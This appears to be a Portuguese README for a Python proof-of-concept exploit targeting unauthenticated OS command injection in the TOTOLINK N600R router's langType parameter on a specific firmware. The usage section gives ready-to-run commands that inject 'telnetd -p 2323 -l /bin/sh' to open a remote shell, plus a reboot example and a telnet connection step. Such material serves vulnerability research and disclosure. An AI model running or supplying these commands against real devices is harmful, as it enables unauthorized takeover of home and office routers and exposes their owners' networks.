
Prova de conceito em Python para injeção de comandos do sistema operacional sem autenticação no TOTOLINK N600R, explorando o parâmetro langType para executar comandos arbitrários no dispositivo.
Prova de conceito em Python para injeção de comandos não autenticada no TOTOLINK N600R.
| Produto | TOTOLINK N600R |
| Firmware | V5.3c.7159_B20190425 |
| Tipo | Injeção de comandos do sistema operacional (CWE-78) |
| Parâmetro | langType |
| Endpoint | /cgi-bin/cstecgi.cgi |
| CVSS v3.1 | 9.8 Crítico |
Foi descoberto que o TOTOLink N600R V5.3c.7159_B20190425 contém uma vulnerabilidade de injeção de comandos por meio do parâmetro langtype em /setting/setLanguageCfg.
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
# Uso: python3 poc.py <ALVO> <COMANDO>
# Exemplo: python3 poc.py 192.168.68.1 "reboot"
# Exemplo: python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"
python3 poc.py <ALVO> <COMANDO>
Usando o PoC para executar remotamente no alvo a ativação do /bin/sh na porta 2323
python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

Veja o resultado se a porta 2323 foi ativada

Conecte-se ao alvo usando telnet pela porta 2323
telnet 192.168.68.1 2323

Fornecido como está, sem garantias. O autor não é responsável por uso indevido ou danos.